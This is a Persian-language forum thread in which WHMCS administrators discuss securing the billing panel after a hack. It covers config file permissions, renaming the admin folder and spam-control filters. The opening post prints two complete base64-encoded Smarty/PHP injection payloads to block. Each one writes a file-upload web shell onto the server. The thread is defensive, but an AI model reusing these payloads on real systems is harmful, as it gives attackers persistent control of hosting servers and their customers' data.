-
January 5th, 2014, 17:08
عضو انجمن
مشکل امنیتی در whmcs
سلام دوستان در تاپیکی در همین انجمن مطلبی رو مشاهده و یاد گرفتم که درصدی از امنیت WHMCS رو تامین کنم ولی در بعضی جاهاش به مشکل برخودم که از استادان یا یوزر های محترم
ممنون میشم که به سوالاتم پاسخ دهند
ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــ
سوال اول :
برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت دو کد هک
کد:
{php}eval(base64_decode(' JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2 YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1 pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3 ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG NvZGUpOw=='));{/php}
کد:
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}
را بلوک کنید
ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــــ
این سوال اول بود که اصلا نفهمیدم کجا رو میگه ! اینم سوال دومم
== > دسترسی فایل کانفیگم بذارید رو 444
اینم دقیق نمی دونم چی رو میگه !
سپاس گزار میشم که اگه پاسخم رو بدید
-
تعداد تشکر ها از SoltanHost.Net به دلیل پست مفید
-
January 5th, 2014 17:08
# ADS
-
January 5th, 2014, 17:15
عضو دائم
پاسخ : مشکل امنیتی در whmcs
مورد اول
برید به این آدرس
http://clients.site.com/admin/configticketspamcontrol.php
مورد دوم هم برید داخل سیپنلتون و سطح دسترسی فایل
configuration.php رو روی 400 بذارید
-
تعداد تشکر ها ازAshkankamangar.ir به دلیل پست مفید
-
January 5th, 2014, 17:16
عضو دائم
کد اول نباید ارسال بشه از طرف کاربر
فایل دوم هم همون configortion.php هست
پریمیشن 400 بهتر هست
-
تعداد تشکر ها از vahab00 به دلیل پست مفید
-
January 5th, 2014, 17:19
عضو انجمن
یعنی فایل مدیریت رو تغییر اسم بدید و در فایل کانفیگ (configuration.php) این خط رو اضافه کنید
$customadminpath = ' name admin';
بجای نیم ادمین اسم فایل ادمین که تغییر دادید رو بنویسید.
-
تعداد تشکر ها از M-Sadeghi به دلیل پست مفید
-
January 5th, 2014, 17:29
عضو انجمن
سپاس از همه دوستان ، اقای ام - صادقی من همین کار رو کاملا درست انجام دادم ولی وقتی میزنم وارد پنل ادمینم بشه مثل
http://my damin name.com/adminpanel
یعنی ادمین رو به ادمین پنل اسم پوشه رو تغیر دادم ولی حالا که این ادرس رو میزنم می نویسه Language Folder Not Found چیکار کنم الان ؟
-
-
January 5th, 2014, 18:31
عضو انجمن
-
-
January 5th, 2014, 18:35
آقا شما اگر از نسخه جدید استفاده کنی نیازی نیست به این تنظیمات اصلا نیست
توی انجمن نسخه ی 5.2.15رو خودم گذاشتم کامل هست که باید نصب کنین
-
تعداد تشکر ها از ULTRAWEB به دلیل پست مفید
-
January 5th, 2014, 18:47
عضو انجمن
سلام بله از اخرین نسخه استفاده میکنم ولی یه هکر ایرانی هکش کرده بود ! اونم اخرین نسخه بود
الان به این مشکل هنگام پرداخت بر میخورم توی انجمن هم تاپیک ها رو مشاهده و طبق گفتهشون پیش رفتم همه چیز درسته ولی نمی دونم چرا این ارور رو میده
اینم ارور : Gateway Module '' is Missing or Invalid
-
-
January 5th, 2014, 19:09
عضو انجمن
آپ ... ( تاپیک رو بالا نگه میدارم تا عزیزان جواب بدن )
-
-
January 5th, 2014, 19:17
عضو انجمن
سلام
در مورد اسم
باید هم اسم فایل را تغییر بدید هم در فایل کانفیگ $customadminpath = ' name admin'; را اضافه کنید دقیق انجام بدید نباید مشکلی باشه
موفق باشید
-
تعداد تشکر ها از arvin_b به دلیل پست مفید